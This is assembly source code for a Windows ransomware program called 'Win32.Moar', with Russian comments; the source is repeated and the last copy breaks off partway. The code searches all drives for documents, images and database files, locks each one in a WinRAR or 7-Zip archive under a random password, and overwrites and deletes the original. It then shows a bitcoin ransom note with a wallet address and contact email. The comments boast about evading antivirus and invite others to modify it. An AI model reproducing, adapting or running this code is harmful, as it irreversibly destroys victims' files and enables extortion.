; Win32. Moar - вирус вымогатель, принципом работы которого является упаковка файлов архиватором
; с использованием случайного пароля.
; Создан с учетом того, что одного архиватора может не быть, поэтому возможно использование
; как WinRar, так и 7 - Zip. Пути к ним получаются динамически из реестра.
; Пароль для каждого файла генерируется новый и случайный, длиной 64 символа - брутфорс
; идет нахуй. EndUser идет туда же - нас не ебет, получит ли он свои данные обратно.
;
; Moar - от двух слов "more" и "archive" , т. е. название описывает функционал
; вируса - использование нескольких архиваторов для надежности.
;
; Далее исходный код откомментирован - при желании можно добавить своих расширений
; файлов или изменить алгоритм работы.
;
; После компиляции, размер вируса - 3584 байт. Антивирусы смачно причмокивают - моар не вызывает
; подозрительных API и прочего, никто на бинарник не реагирует, абсолютно никто.
; Единственный минус - достаточно небольшая скорость работы, никак не зависящая от нас.
; Процесс тормозится запуском архиватора и ожиданием пакования файлов. Поэтому, ускорить это никак нельзя.
.686
. model flat, stdcall
option casemap: none
include \masm32\include \windows. inc
include \masm32\include \kernel32. inc
include \masm32\include \user32. inc
include \masm32\include \shlwapi. inc
include \masm32\include \shell32. inc
include \masm32\include \advapi32. inc
includelib \masm32\lib\kernel32. lib
includelib \masm32\lib\user32. lib
includelib \masm32\lib\shlwapi. lib
includelib \masm32\lib\shell32. lib
includelib \masm32\lib\advapi32. lib
GetPackerPath PROTO : DWORD, : DWORD, : DWORD, : DWORD
BUFFER_SIZE equ 100000h
BufLen equ 4096
WINRAR_PACK equ 1
SEVENZIP_PACK equ 2
. data
TypeOfPacker db 0
; Данные для получения пути к архиватору WinRar.
WinrarReg1 db 'WinRAR\shell\open\command' , 0
WinrarReg2 db 0
WinrarReg3 db 'rar.exe' , 0
WinrarMask db 'a -hp%s "%s" "%s"' , 0
WinrarExt db '.rar' , 0
; Данные для получения пути к архиватору 7 - Zip.
SevenZipReg1 db 'Applications\7zFM.exe\shell\open\command' , 0
SevenZipReg2 db 0
SevenZipReg3 db '7z.exe' , 0
SevenZipMask db 'a -p%s "%s" "%s"' , 0
SevenZipExt db '.7z' , 0
; Две строки - для пропуска этих директорий при поиске файлов.
fake1 db '.' , 0
fake2 db '..' , 0
; Строковая подпись вируса - она добавляется к именам создаваемых архивов.
VirSign db '_MOAR_' , 0
; Количество масок( расширений) файлов, которые обрабатываются.
; При добавлении своих расширений, соответственно увеличивать.
EXTENSION_COUNT dd 4
; Сами расширения, вернее маски для поиска. Допустимо использование wildcard'ов.
lbl1 db ' *. lnk',0
db ' *. bmp',0
db ' *. jpg',0
db ' *. jpeg',0
db ' *. docx',0
db ' *. docm',0
db ' *. doc',0
db ' *. xlsx',0
db ' *. xls',0
db ' *. xlsm',0
db ' *. 1CD',0
db ' *. dbf',0
; Сообщение, показываемое пользователю. Изменить на свой вкус.
UserMessage db ' Внимание! Все Ваши файлы были зашифрованы и помещены в архив с паролем. Оригиналы файлов были удалены. ',13,10
db ' Т. е. вы больше не имеете доступа к своим файлам. ',13,10
db ' Для того, чтобы получить пароль и расшифровать файлы, оплатите 100 долларов в биткоинах на этот кошелек: ',13,10
db ' 1FneovZD18CoBJSz4cGiJVDt5C32yWh2i6',13,10
db ' Или этот же кошелек вы можете скопировать по ссылке: https: //g...content-available-to-author-only...o.gl/j4XCL2',13,10
db 'Оплатить биткоинами через банки: https://b...content-available-to-author-only...k.net' , 13 , 10
db 'Пароль вы сможете получить после оплаты, написав на lohodf@mail.ru' , 0
. data?
PackerPath db BufLen dup ( ?)
SearchBuf db BufLen dup ( ?)
FilePathBuf db BufLen dup ( ?)
ArName db BufLen dup ( ?)
TmpBuf db BufLen dup ( ?)
GeneratedPassword db 65 dup ( ?)
PackerPathPointer dd ?
hmem dd ?
sei SHELLEXECUTEINFO <>
. code
start:
; Получаем путь к "rar.exe" - консольной утилите WinRar для архивирования файлов.
invoke GetPackerPath, addr WinrarReg1, addr WinrarReg2, addr WinrarReg3, WINRAR_PACK
test eax, eax
jne getpath
; Если WinRar установлен и путь был получен - прыгаем и едем далее.
; В обратном же случае пытаемся получить путь к "7z.exe" - аналогичная консольная программа от 7 - Zip.
invoke GetPackerPath, addr SevenZipReg1, addr SevenZipReg2, addr SevenZipReg3, SEVENZIP_PACK
test eax, eax
jne getpath
; Если же и этой прораммы нет в системе - выходим, нам здесь делать нечего, система - унылое говно.
jmp ohshit
getpath:
; Выделяем память для вайпинга файлов. Так называется стирание файлов без возможности восстановления.
; Просто удалить файл - способ для криворуких, т. к. различные Лепрозории Касперского публикуют
; зиродей- методы для восстановления файлов.
invoke GlobalAlloc, GPTR, BUFFER_SIZE
. if ( eax== 0 )
jmp ohshit
. endif
mov hmem, eax
; Вызываем процедуру поиска и обработки файлов.
call FileSearch
; Освобождаем память, выделенную под буфер для вайпинга.
invoke GlobalFree, hmem
; Показываем пользователю сообщение о том, что он криворукий дебил - взял и запустил левый ЕХЕ.
invoke MessageBox, 0 , addr UserMessage, 0 , 0
ohshit:
invoke ExitProcess, 0
; Процедура получения пути к архиватору. В ней нет ничего сложного, no comments.
GetPackerPath proc p1: DWORD, p2: DWORD, p3: DWORD, p4: DWORD
LOCAL ValLen : DWORD
LOCAL lpdwDisp : DWORD
LOCAL hKey : DWORD
invoke RegCreateKeyEx, HKEY_CLASSES_ROOT, p1, 0 , 0 , 0 , KEY_READ, 0 , addr hKey, addr lpdwDisp
test eax, eax
je @ F
xor eax, eax
ret
@@:
mov dword ptr [ ValLen] , BufLen
invoke RegQueryValueEx, hKey, p2, 0 , 0 , addr PackerPath, addr ValLen
test eax, eax
je @ F
xor eax, eax
ret
@@:
invoke RegCloseKey, hKey
; Путь в реестре хранится в таком виде: "C:\Program Files\WinRAR\WinRAR.exe" "%1" .
; Поэтому его нужно пропарсить.
invoke lstrlen, addr PackerPath
dec eax
mov ecx, eax
mov esi, offset PackerPath
inc esi
mov ebx, esi
mov dword ptr [ PackerPathPointer] , ebx
@@:
lodsb
cmp al, '"'
je @ F
loop @ B
@@:
mov byte ptr [ esi- 1 ] , 0
invoke PathFindFileName, ebx
mov byte ptr [ eax] , 0
invoke lstrcat, ebx, p3
; В переменную TypeOfPacker записывается значение - идентификатор используемого архиватора, четвертый параметр - p4
; Т. е если путь к винрару был удачно получен, пишем туда WINRAR_PACK, если к 7 - Zip'y - SEVENZIP_PACK.
mov eax, dword ptr [p4]
mov byte ptr [TypeOfPacker], al
mov eax, 1
ret
GetPackerPath endp
; Процедура пакования файлов.
PackFile proc
; Генерируем для архива пароль.
call PwdGen
invoke lstrcpy, addr ArName, addr FilePathBuf
invoke PathFindExtension, addr ArName
invoke lstrcat, addr ArName, addr VirSign
mov al, byte ptr [TypeOfPacker]
cmp al, WINRAR_PACK
jne @F
invoke lstrcat, addr ArName, addr WinrarExt
invoke wsprintf, addr TmpBuf, addr WinrarMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
jmp done_2
@@:
invoke lstrcat, addr ArName, addr SevenZipExt
invoke wsprintf, addr TmpBuf, addr SevenZipMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
done_2:
invoke RtlZeroMemory, addr sei, sizeof sei
; Заполняем структуру SHELLEXECUTEINFO и запускаем rar.exe с парамтером командной строки,
; в котором хранится путь к файлу для шифрования, путь к выходящему файлу и параметры упаковки.
mov sei.cbSize, sizeof sei
mov sei.fMask, SEE_MASK_NOCLOSEPROCESS
mov sei.nShow, SW_HIDE
mov eax, dword ptr [PackerPathPointer]
mov sei.lpFile, eax
mov sei.lpParameters, offset TmpBuf
invoke ShellExecuteEx, addr sei
test eax, eax
jne run_good
; Если запуск апроцеса архивации неудался, выходим.
ret
run_good:
; Ждем завершения паковки.
invoke WaitForSingleObject, sei.hProcess, INFINITE
invoke CloseHandle, sei.hProcess
; Стираем файл без возможности воссановления.
call WipeFile
ret
PackFile endp
; Рекурсивная процедура поиска файлов, автор - Ct757.
find_files proc
push ebp
mov ebp,esp
sub esp,144h
lea eax,[ebp-144h]
invoke FindFirstFile,offset SearchBuf,eax
inc eax
je exit
dec eax
mov dword ptr [ebp-6h],eax
find_next:
mov eax,dword ptr [ebp-144h]
and eax,FILE_ATTRIBUTE_DIRECTORY
je found
lea eax,[ebp-118h]
invoke lstrcmp,offset fake1,eax
test eax,eax
je next
lea eax,[ebp-118h]
invoke lstrcmp,offset fake2,eax
test eax,eax
je next
invoke lstrlen,offset SearchBuf
sub eax,3
push eax
mov byte ptr [SearchBuf+eax],0
lea eax,[ebp-118h]
invoke lstrcat,offset SearchBuf,eax
invoke lstrlen,offset SearchBuf
mov dword ptr [SearchBuf+eax],' *.* \'
mov byte ptr [SearchBuf+eax+4],0
call find_files
pop eax
mov dword ptr [SearchBuf+eax-1],' *.* \'
mov byte ptr [SearchBuf+eax+3],0
jmp next
found:
lea ebx,[ebp-118h]
; Проверяем, подходит ли найденный файл нам - сверяем с расширениями.
mov ecx, dword ptr [EXTENSION_COUNT]
mov esi, offset lbl1
@@:
push ecx
invoke PathMatchSpec, ebx, esi
test eax, eax
jne @F
invoke lstrlen, esi
add esi, eax
inc esi
pop ecx
loop @B
; Если нет - ищем следующий.
jmp next
@@:
; Создаем полный путь к найденому файлу.
invoke lstrcpy, addr FilePathBuf, addr SearchBuf
invoke PathFindFileName, addr FilePathBuf
mov byte ptr [eax], 0
lea eax,[ebp-118h]
invoke lstrcat, addr FilePathBuf, eax
; Вызываем процедуру паковки файлов.
call PackFile
next:
lea eax,[ebp-144h]
invoke FindNextFile,dword ptr [ebp-6h],eax
test eax,eax
jne find_next
invoke FindClose,dword ptr [ebp-6h]
exit:
leave
ret
find_files endp
; Процедура, вызывающая поиск файлов по дискам. Т.е. она перечисляет доступные диски
; и вызывает для каждого из них find_files.
FileSearch proc
invoke SetErrorMode,SEM_FAILCRITICALERRORS
invoke GetLogicalDrives
mov ecx,25
find_drives:
mov ebx,1
shl ebx,cl
and ebx,eax
je no_disk
add cl,65
mov byte ptr SearchBuf,cl
sub cl,65
mov dword ptr SearchBuf+1,' .* \: '
mov byte ptr SearchBuf+5,' * '
mov byte ptr SearchBuf+6,0
push eax
push ecx
call find_files
pop ecx
pop eax
no_disk:
dec ecx
jge find_drives
ret
FileSearch endp
; Тут происходит генерация пароля для архива.
; Для получения случайных чисел в нужном диапазоне, вызываем GetRandom.
PwdGen proc
lea edi, GeneratedPassword
mov ecx, 64
@@:
call GetRandom
stosb
loop @B
ret
PwdGen endp
; Получаем случайное число в диапазоне [ 41h..5Ah ].
GetRandom proc
push edx
push ecx
mov ecx,5Ah
sub ecx,41h
inc ecx
push edx
push ecx
db 0Fh, 31h
xor eax,edx
xor edx,edx
mov ecx,127773
div ecx
mov ecx,eax
mov eax,16807
mul edx
mov edx,ecx
mov ecx,eax
mov eax,2836
mul edx
sub ecx,eax
xor edx,edx
mov eax,ecx
mov ecx,100000
div ecx
mov eax,edx
pop ecx
pop edx
xor edx,edx
div ecx
mov eax,edx
add eax,41h
pop ecx
pop edx
ret
GetRandom endp
; Процедура вайпинга файлов.
; Для этого сначала файл перезаписывается нулями, затем укорачивается до нулевой длины и удаляется.
; Как показали эксперименты, после такого, программы восстановления файлов нервно курят в сторонке.
WipeFile proc
LOCAL h :DWORD
LOCAL nw :DWORD
LOCAL dmod :DWORD
LOCAL towrite :DWORD
invoke CreateFile, addr FilePathBuf, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL
cmp eax, -1
jne @F
ret
@@:
mov h, eax
invoke SetFilePointer, h, 0, NULL, FILE_BEGIN
invoke GetFileSize, h, NULL
cmp eax, BUFFER_SIZE
jge @F
mov ecx, 1
mov dword ptr [towrite], eax
mov dword ptr [dmod], 0
jmp loop_wipe
@@:
xor edx, edx
mov ebx, BUFFER_SIZE
div ebx
mov ecx, eax
mov dword ptr [towrite], BUFFER_SIZE
mov dword ptr [dmod], edx
loop_wipe:
push ecx
invoke WriteFile, h, [hmem], [towrite], addr nw, NULL
pop ecx
loop loop_wipe
mov eax, dword ptr [dmod]
test eax, eax
je bez_ostatka
invoke WriteFile, h, [hmem], [dmod], addr nw, NULL
bez_ostatka:
invoke SetFilePointer, h, 0, NULL, FILE_BEGIN
invoke SetEndOfFile, h
invoke CloseHandle, h
invoke DeleteFile, addr FilePathBuf
ret
WipeFile endp
end start
; Win32.Moar - вирус вымогатель, принципом работы которого является упаковка файлов архиватором
; с использованием случайного пароля.
; Создан с учетом того, что одного архиватора может не быть, поэтому возможно использование 
; как WinRar, так и 7-Zip. Пути к ним получаются динамически из реестра.
; Пароль для каждого файла генерируется новый и случайный, длиной 64 символа - брутфорс
; идет нахуй. EndUser идет туда же - нас не ебет, получит ли он свои данные обратно.
;
; Moar - от двух слов "more" и "archive", т.е. название описывает функционал 
; вируса - использование нескольких архиваторов для надежности.
;
; Далее исходный код откомментирован - при желании можно добавить своих расширений
; файлов или изменить алгоритм работы.
;
; После компиляции, размер вируса - 3584 байт. Антивирусы смачно причмокивают - моар не вызывает 
; подозрительных API и прочего, никто на бинарник не реагирует, абсолютно никто.
; Единственный минус - достаточно небольшая скорость работы, никак не зависящая от нас. 
; Процесс тормозится запуском архиватора и ожиданием пакования файлов. Поэтому, ускорить это никак нельзя.

.686
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shlwapi.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shlwapi.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib

      GetPackerPath     PROTO  :DWORD, :DWORD, :DWORD, :DWORD
      BUFFER_SIZE       equ    100000h 
      BufLen            equ    4096
      WINRAR_PACK       equ    1
      SEVENZIP_PACK     equ    2

.data
      TypeOfPacker      db     0
; Данные для получения пути к архиватору WinRar.
      WinrarReg1        db     'WinRAR\shell\open\command',0
      WinrarReg2        db     0
      WinrarReg3        db     'rar.exe',0
      WinrarMask        db     'a -hp%s "%s" "%s"',0
      WinrarExt         db     '.rar',0
; Данные для получения пути к архиватору 7-Zip.
      SevenZipReg1      db     'Applications\7zFM.exe\shell\open\command',0
      SevenZipReg2      db     0
      SevenZipReg3      db     '7z.exe',0
      SevenZipMask      db     'a -p%s "%s" "%s"',0
      SevenZipExt       db     '.7z',0
; Две строки - для пропуска этих директорий при поиске файлов.
      fake1             db     '.',0
      fake2             db     '..',0
; Строковая подпись вируса - она добавляется к именам создаваемых архивов.
      VirSign           db     '_MOAR_',0
      
; Количество масок(расширений) файлов, которые обрабатываются. 
; При добавлении своих расширений, соответственно увеличивать.
      EXTENSION_COUNT   dd     4
; Сами расширения, вернее маски для поиска. Допустимо использование wildcard'ов.
      lbl1              db     '*.lnk',0
                        db     '*.bmp',0
                        db     '*.jpg',0
                        db     '*.jpeg',0
                        db     '*.docx',0
                        db     '*.docm',0
                        db     '*.doc',0
                        db     '*.xlsx',0
                        db     '*.xls',0
                        db     '*.xlsm',0
                        db     '*.1CD',0
                        db     '*.dbf',0
; Сообщение, показываемое пользователю. Изменить на свой вкус.
      UserMessage       db     'Внимание! Все Ваши файлы были зашифрованы и помещены в архив с паролем. Оригиналы файлов были удалены.',13,10
                        db     'Т.е. вы больше не имеете доступа к своим файлам.',13,10
                        db     'Для того, чтобы получить пароль и расшифровать файлы, оплатите 100 долларов в биткоинах на этот кошелек:',13,10
                        db     '1FneovZD18CoBJSz4cGiJVDt5C32yWh2i6',13,10
                        db     'Или этот же кошелек вы можете скопировать по ссылке: https://g...content-available-to-author-only...o.gl/j4XCL2',13,10
                        db     'Оплатить биткоинами через банки: https://b...content-available-to-author-only...k.net',13,10
                        db     'Пароль вы сможете получить после оплаты, написав на lohodf@mail.ru',0
      
.data?
      PackerPath        db     BufLen dup (?)
      SearchBuf         db     BufLen dup (?)
      FilePathBuf       db     BufLen dup (?)
      ArName            db     BufLen dup (?)
      TmpBuf            db     BufLen dup (?)
      GeneratedPassword db     65     dup (?)
      PackerPathPointer dd     ?
      hmem              dd     ?
      sei               SHELLEXECUTEINFO      <>

.code
start:
; Получаем путь к "rar.exe" - консольной утилите WinRar для архивирования файлов.
      invoke  GetPackerPath, addr WinrarReg1, addr WinrarReg2, addr WinrarReg3, WINRAR_PACK
      test    eax, eax
      jne     getpath
; Если WinRar установлен и путь был получен - прыгаем и едем далее.
; В обратном же случае пытаемся получить путь к "7z.exe" - аналогичная консольная программа от 7-Zip.
      invoke  GetPackerPath, addr SevenZipReg1, addr SevenZipReg2, addr SevenZipReg3, SEVENZIP_PACK
      test    eax, eax
      jne     getpath
; Если же и этой прораммы нет в системе - выходим, нам здесь делать нечего, система - унылое говно.
              jmp     ohshit
      getpath:
; Выделяем память для вайпинга файлов. Так называется стирание файлов без возможности восстановления.
; Просто удалить файл - способ для криворуких, т.к. различные Лепрозории Касперского публикуют 
; зиродей-методы для восстановления файлов.
      invoke  GlobalAlloc, GPTR, BUFFER_SIZE
      .if (eax==0)
              jmp     ohshit
      .endif
      mov     hmem, eax
; Вызываем процедуру поиска и обработки файлов.
      call    FileSearch
; Освобождаем память, выделенную под буфер для вайпинга.
      invoke  GlobalFree, hmem
; Показываем пользователю сообщение о том, что он криворукий дебил - взял и запустил левый ЕХЕ.
      invoke  MessageBox, 0, addr UserMessage, 0, 0
ohshit:
      invoke  ExitProcess, 0

; Процедура получения пути к архиватору. В ней нет ничего сложного, no comments.
GetPackerPath proc p1:DWORD, p2:DWORD, p3:DWORD, p4:DWORD
   LOCAL ValLen    :DWORD
   LOCAL lpdwDisp  :DWORD
   LOCAL hKey      :DWORD
      invoke  RegCreateKeyEx, HKEY_CLASSES_ROOT, p1, 0, 0, 0, KEY_READ, 0, addr hKey, addr lpdwDisp
      test    eax, eax
      je      @F
              xor     eax, eax
              ret
      @@:
      mov     dword ptr [ValLen], BufLen
      invoke  RegQueryValueEx, hKey, p2, 0, 0, addr PackerPath, addr ValLen
      test    eax, eax
      je      @F
              xor     eax, eax
              ret
      @@:
      invoke  RegCloseKey, hKey
; Путь в реестре хранится в таком виде: "C:\Program Files\WinRAR\WinRAR.exe" "%1".
; Поэтому его нужно пропарсить.
      invoke  lstrlen, addr PackerPath
      dec     eax
      mov     ecx, eax
      mov     esi, offset PackerPath
      inc     esi
      mov     ebx, esi
      mov     dword ptr [PackerPathPointer], ebx
      @@:
      lodsb
      cmp     al, '"'
      je      @F
      loop    @B
      @@:
      mov     byte ptr [esi-1], 0
      invoke  PathFindFileName, ebx
      mov     byte ptr [eax], 0
      invoke  lstrcat, ebx, p3
; В переменную TypeOfPacker записывается значение - идентификатор используемого архиватора, четвертый параметр - p4
; Т.е если путь к винрару был удачно получен, пишем туда WINRAR_PACK, если к 7-Zip'y - SEVENZIP_PACK.
      mov     eax, dword ptr [p4]
      mov     byte ptr [TypeOfPacker], al
      mov     eax, 1
      ret
GetPackerPath endp

; Процедура пакования файлов.
PackFile proc
; Генерируем для архива пароль.
      call    PwdGen
      invoke  lstrcpy, addr ArName, addr FilePathBuf
      invoke  PathFindExtension, addr ArName
      invoke  lstrcat, addr ArName, addr VirSign
      mov     al, byte ptr [TypeOfPacker]
      cmp     al, WINRAR_PACK
      jne     @F
              invoke  lstrcat, addr ArName, addr WinrarExt
              invoke  wsprintf, addr TmpBuf, addr WinrarMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
              jmp     done_2
      @@:
              invoke  lstrcat, addr ArName, addr SevenZipExt
              invoke  wsprintf, addr TmpBuf, addr SevenZipMask, addr GeneratedPassword, addr ArName, addr FilePathBuf
      done_2:
      invoke  RtlZeroMemory, addr sei, sizeof sei
; Заполняем структуру SHELLEXECUTEINFO и запускаем rar.exe с парамтером командной строки,
; в котором хранится путь к файлу для шифрования, путь к выходящему файлу и параметры упаковки.
      mov     sei.cbSize, sizeof sei
      mov     sei.fMask, SEE_MASK_NOCLOSEPROCESS
      mov     sei.nShow, SW_HIDE
      mov     eax, dword ptr [PackerPathPointer]
      mov     sei.lpFile, eax
      mov     sei.lpParameters, offset TmpBuf
      invoke  ShellExecuteEx, addr sei
      test    eax, eax
      jne     run_good
; Если запуск апроцеса архивации неудался, выходим.
              ret
      run_good:
; Ждем завершения паковки.
      invoke  WaitForSingleObject, sei.hProcess, INFINITE
      invoke  CloseHandle, sei.hProcess
; Стираем файл без возможности воссановления.
      call    WipeFile
      ret
PackFile endp

; Рекурсивная процедура поиска файлов, автор - Ct757.
find_files proc
      push    ebp
      mov     ebp,esp
      sub     esp,144h
      lea     eax,[ebp-144h]
      invoke  FindFirstFile,offset SearchBuf,eax
      inc     eax
      je      exit
      dec     eax
      mov     dword ptr [ebp-6h],eax
find_next:
      mov     eax,dword ptr [ebp-144h]
      and     eax,FILE_ATTRIBUTE_DIRECTORY
      je      found
      lea     eax,[ebp-118h]
      invoke  lstrcmp,offset fake1,eax
      test    eax,eax
      je      next
      lea     eax,[ebp-118h]
      invoke  lstrcmp,offset fake2,eax
      test    eax,eax
      je      next
      invoke  lstrlen,offset SearchBuf
      sub     eax,3
      push    eax
      mov     byte ptr [SearchBuf+eax],0
      lea     eax,[ebp-118h]
      invoke  lstrcat,offset SearchBuf,eax
      invoke  lstrlen,offset SearchBuf
      mov     dword ptr [SearchBuf+eax],'*.*\'
      mov     byte ptr [SearchBuf+eax+4],0
      call    find_files
      pop     eax
      mov     dword ptr [SearchBuf+eax-1],'*.*\'
      mov     byte ptr [SearchBuf+eax+3],0
      jmp     next
found:
      lea     ebx,[ebp-118h]
; Проверяем, подходит ли найденный файл нам - сверяем с расширениями.
      mov     ecx, dword ptr [EXTENSION_COUNT]
      mov     esi, offset lbl1
      @@:
      push    ecx
      invoke  PathMatchSpec, ebx, esi
      test    eax, eax
      jne     @F
      invoke  lstrlen, esi
      add     esi, eax
      inc     esi
      pop     ecx
      loop    @B
; Если нет - ищем следующий.
      jmp     next
      @@:
; Создаем полный путь к найденому файлу.
      invoke  lstrcpy, addr FilePathBuf, addr SearchBuf
      invoke  PathFindFileName, addr FilePathBuf
      mov     byte ptr [eax], 0
      lea     eax,[ebp-118h]
      invoke  lstrcat, addr FilePathBuf, eax
; Вызываем процедуру паковки файлов.
      call    PackFile
next:
      lea     eax,[ebp-144h]
      invoke  FindNextFile,dword ptr [ebp-6h],eax
      test    eax,eax
      jne     find_next
      invoke  FindClose,dword ptr [ebp-6h]
exit:
      leave
      ret
find_files endp

; Процедура, вызывающая поиск файлов по дискам. Т.е. она перечисляет доступные диски
; и вызывает для каждого из них find_files.
FileSearch proc
      invoke  SetErrorMode,SEM_FAILCRITICALERRORS
      invoke  GetLogicalDrives
      mov     ecx,25
find_drives:
      mov     ebx,1
      shl     ebx,cl
      and     ebx,eax
      je      no_disk
      add     cl,65
      mov     byte ptr SearchBuf,cl
      sub     cl,65
      mov     dword ptr SearchBuf+1,'.*\:'
      mov     byte ptr SearchBuf+5,'*'
      mov     byte ptr SearchBuf+6,0
      push    eax
      push    ecx
      call    find_files
      pop     ecx
      pop     eax
no_disk:
      dec     ecx
      jge     find_drives
      ret
FileSearch endp

; Тут происходит генерация пароля для архива. 
; Для получения случайных чисел в нужном диапазоне, вызываем GetRandom.
PwdGen proc
      lea     edi, GeneratedPassword
      mov     ecx, 64
      @@:
      call    GetRandom
      stosb
      loop    @B
      ret
PwdGen endp

; Получаем случайное число в диапазоне [ 41h..5Ah ].
GetRandom proc
      push    edx
      push    ecx
      mov     ecx,5Ah
      sub     ecx,41h
      inc     ecx
      push    edx
      push    ecx
      db      0Fh, 31h
      xor     eax,edx
      xor     edx,edx
      mov     ecx,127773
      div     ecx
      mov     ecx,eax
      mov     eax,16807
      mul     edx
      mov     edx,ecx
      mov     ecx,eax
      mov     eax,2836
      mul     edx
      sub     ecx,eax
      xor     edx,edx
      mov     eax,ecx
      mov     ecx,100000
      div     ecx
      mov     eax,edx
      pop     ecx
      pop     edx
      xor     edx,edx
      div     ecx
      mov     eax,edx
      add     eax,41h
      pop     ecx
      pop     edx
      ret
GetRandom endp

; Процедура вайпинга файлов.
; Для этого сначала файл перезаписывается нулями, затем укорачивается до нулевой длины и удаляется.
; Как показали эксперименты, после такого, программы восстановления файлов нервно курят в сторонке.
WipeFile proc
   LOCAL h       :DWORD
   LOCAL nw      :DWORD
   LOCAL dmod    :DWORD
   LOCAL towrite :DWORD
      invoke  CreateFile, addr FilePathBuf, GENERIC_READ or GENERIC_WRITE, FILE_SHARE_READ or FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL
      cmp     eax, -1
      jne     @F
              ret
      @@:
      mov     h, eax
      invoke  SetFilePointer, h, 0, NULL, FILE_BEGIN
      invoke  GetFileSize, h, NULL
      cmp     eax, BUFFER_SIZE
      jge     @F
              mov ecx, 1
              mov dword ptr [towrite], eax
              mov dword ptr [dmod], 0
              jmp loop_wipe
      @@:
              xor edx, edx
              mov ebx, BUFFER_SIZE
              div ebx
              mov ecx, eax
              mov dword ptr [towrite], BUFFER_SIZE
              mov dword ptr [dmod], edx
      loop_wipe:
      push    ecx
      invoke  WriteFile, h, [hmem], [towrite], addr nw, NULL
      pop     ecx
      loop    loop_wipe
      mov     eax, dword ptr [dmod]
      test    eax, eax
      je      bez_ostatka
      invoke  WriteFile, h, [hmem], [dmod], addr nw, NULL
      bez_ostatka:
      invoke  SetFilePointer, h, 0, NULL, FILE_BEGIN
      invoke  SetEndOfFile, h
      invoke  CloseHandle, h
      invoke  DeleteFile, addr FilePathBuf
      ret
WipeFile endp

end start
stdout
; Win32.Moar - вирус вымогатель, принципом работы которого является упаковка файлов архиватором
; с использованием случайного пароля.
; Создан с учетом того, что одного архиватора может не быть, поэтому возможно использование
; как WinRar, так и 7-Zip. Пути к ним получаются динамически из реестра.
; Пароль для каждого файла генерируется новый и случайный, длиной 64 символа - брутфорс
; идет нахуй. EndUser идет туда же - нас не ебет, получит ли он свои данные обратно.
;
; Moar - от двух слов "more" и "archive", т.е. название описывает функционал
; вируса - использование нескольких архиваторов для надежности.
;
; Далее исходный код откомментирован - при желании можно добавить своих расширений
; файлов или изменить алгоритм работы.
;
; После компиляции, размер вируса - 3584 байт. Антивирусы смачно причмокивают - моар не вызывает
; подозрительных API и прочего, никто на бинарник не реагирует, абсолютно никто.
; Единственный минус - достаточно небольшая скорость работы, никак не зависящая от нас.
; Процесс тормозится запуском архиватора и ожиданием пакования файлов. Поэтому, ускорить это никак нельзя.
.686
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\shlwapi.inc
include \masm32\include\shell32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\shlwapi.lib
includelib \masm32\lib\shell32.lib
includelib \masm32\lib\advapi32.lib
GetPackerPath PROTO :DWORD, :DWORD, :DWORD, :DWORD
BUFFER_SIZE equ 100000h
BufLen equ 4096
WINRAR_PACK equ 1
SEVENZIP_PACK equ 2
.data
TypeOfPacker db 0
; Данные для получения пути к архиватору WinRar.
WinrarReg1 db 'WinRAR\shell\open\command',0
WinrarReg2 db 0
WinrarReg3 db 'rar.exe',0
WinrarMask db 'a -hp%s "%s" "%s"',0
WinrarExt db '.rar',0
; Данные для получения пути к архиватору 7-Zip.
SevenZipReg1 db 'Applications\7zFM.exe\shell\open\command',0
SevenZipReg2 db 0
SevenZipReg3 db '7z.exe',0
SevenZipMask db 'a -p%s "%s" "%s"',0
SevenZipExt db '.7z',0
; Две строки - для пропуска этих директорий при поиске файлов.
fake1 db '.',0
fake2 db '..',0
; Строковая подпись вируса - она добавляется к именам создаваемых архивов.
VirSign db '_MOAR_',0
; Количество масок(расширений) файлов, которые обрабатываются.
; При добавлении своих расширений, соответственно увеличивать.
EXTENSION_COUNT dd 4
; Сами расширения, вернее маски для поиска. Допустимо использование wildcard'ов.
lbl1 db '*.lnk',0
db '*.bmp',0
db '*.jpg',0
db '*.jpeg',0
db '*.docx',0
db '*.docm',0
db '*.doc',0
db '*.xlsx',0
db '*.xls',0
db '*.xlsm',0
db '*.1CD',0
db '*.dbf',0
; Сообщение, показываемое пользователю. Изменить на свой вкус.
UserMessage db 'Внимание! Все Ваши файлы были зашифрованы и помещены в архив с паролем. Оригиналы файлов были удалены.',13,10
db 'Т.е. вы больше не имеете доступа к своим файлам.',13,10
db 'Для того, чтобы получить пароль и расшифровать файлы, оплатите 100 долларов в биткоинах на этот кошелек:',13,10
db '1FneovZD18CoBJSz4cGiJVDt5C32yWh2i6',13,10
db 'Или этот же кошелек вы можете скопировать по ссылке: https://g...content-available-to-author-only...o.gl/j4XCL2',13,10
db 'Оплатить биткоинами через банки: https://b...content-available-to-author-only...k.net',13,10
db 'Пароль вы сможете получить после оплаты, написав на lohodf@mail.ru',0
.data?
PackerPath db BufLen dup (?)
SearchBuf db BufLen dup (?)
FilePathBuf db BufLen dup (?)
ArName db BufLen dup (?)
TmpBuf db BufLen dup (?)
GeneratedPassword db 65 dup (?)
PackerPathPointer dd ?
hmem dd ?
sei SHELLEXECUTEINFO <>
.code
start:
; Получаем путь к "rar.exe" - консольной утилите WinRar для архивирования файлов.
invoke GetPackerPath, addr WinrarReg1, addr WinrarReg2, addr WinrarReg3, WINRAR_PACK
test eax, eax
jne getpath
; Если WinRar установлен и путь был получен - прыгаем и едем далее.
; В обратном же случае пытаемся получить путь к "7z.exe" - аналогичная консольная программа от 7-Zip.
invoke GetPackerPath, addr SevenZipReg1, addr SevenZipReg2, addr SevenZipReg3, SEVENZIP_PACK
test eax, eax
jne getpath
; Если же и этой прораммы нет в системе - выходим, нам здесь делать нечего, система - унылое говно.
jmp ohshit
getpath:
